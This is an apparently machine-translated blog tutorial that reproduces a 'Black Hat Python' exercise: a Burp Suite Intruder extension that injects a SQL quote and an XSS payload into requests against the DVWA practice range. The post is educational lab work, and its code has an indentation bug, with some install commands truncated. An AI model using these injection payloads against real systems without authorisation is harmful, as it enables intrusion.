
Burpsuite Core Generator for Python Penetration Testing Primer

Burpsuite Core Generator for Python Penetration Testing Primer

Recently, I received a network security book "Python Black Hat" presented by the Electronic Industry Press, with a total of 24 experiments in the book, and today reproduces the 15th experiment (BurpSuite Core Generator Plugin), my test environment is MBP computer + Kali virtual machine + DVWA online range. At present, only python2.7 is supported, and the soft link is adjusted slightly, and then I uninstalled the JDK and Burpsuite on Kali, and finally used JDK 1.8 and Burpsuite 1.7.36, and successfully reproduced this experiment, by the way, after doing many experiments, I am familiar with it~

Burpsuite Core Generator for Python Penetration Testing Primer


Excellent answerer in cybersecurity

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Step 1: Prepare the environment

times 安装jdk1.8

apt-get update
apt-get install software-properties-common
apt-add-repository 'deb stretch/updates main'
apt-get update
apt-get install openjdk-8-jdk           

Select JDK1.8

update-alternatives --config java           

Update soft connection for python2

ln -s /usr/bin/python2 /usr/bin/python           

Install an earlier version of Burpsuite 1.7.36

sudo chmod +x
sudo ./           

The import is successful, here you need to pay attention to the path does not have Chinese

Burpsuite Core Generator for Python Penetration Testing Primer

Step 2: Prepare the experimental site

Choosing a DVWA Online Range[1]

Step 3: Actual combat drill

1. Enter the xss injection module and submit a string

Burpsuite Core Generator for Python Penetration Testing Primer

2. Then in the proxy module of burp, send the carrier core to the intruder module

Burpsuite Core Generator for Python Penetration Testing Primer

3、在intruder模块中payload页面下,选择payload type为Extension-generated,然后在payload options里面选择BHP Payload Generator 就大功告成了~

Burpsuite Core Generator for Python Penetration Testing Primer

4. Click Start Attack, the pop-up window is actually tested here, but the display is not friendly

Burpsuite Core Generator for Python Penetration Testing Primer

Reference Code:

# -*- coding: utf-8 -*-
# @Time    : 2022/6/14 7:15 PM
# @Author  : ailx10
# @File    :

from burp import IBurpExtender
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator

from java.util import List,ArrayList
import random

class BurpExtender(IBurpExtender,IIntruderPayloadGeneratorFactory):
    def registerExtenderCallbacks(self,callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()



    def getGeneratorName(self):
        return "BHP Payload Generator"

    def createNewInstance(self,attack):
        return BHPFuzzer(self,attack)

class BHPFuzzer(IIntruderPayloadGenerator):
    def __init__(self,extender,attack):
        self._extender = extender
        self._helpers = extender._helpers
        self._attack = attack
        self.max_payloads = 10
        self.num_iterations = 0


    def hasMorePayloads(self):
        if self.num_iterations == self.max_payloads:
            return False
            return True

    def getNextPayload(self,current_payload):
        payload = "".join(chr(x) for x in current_payload)
        payload = self.mutate_payload(payload)
        self.num_iterations += 1
        return payload

    def reset(self):
        self.num_iterations = 0

    def mutate_payload(self,original_payload):
        picker = random.randint(1,3)
        offset = random.randint(0,len(original_payload)-1)
        front,back = original_payload[:offset],original_payload[offset:]
        # SQL
        if picker == 1:
            front += "'"
        # XSS
        elif picker == 2:
            front += "<img src=xss onerror=alert(1)>"
        # Randomly extract a piece of data from the original carrier core, repeat it any number of times,
        # and append it to the end of the front block
        elif picker == 3:
            chunk_length = random.randint(0,len(back)-1)
            repeater = random.randint(1,10)
            for _ in range(repeater):
                front += original_payload[:offset + chunk_length]

        return front + back           
Burpsuite Core Generator for Python Penetration Testing Primer


  1. ^DVWA Online Range

Published on 2022-06-14 21:15

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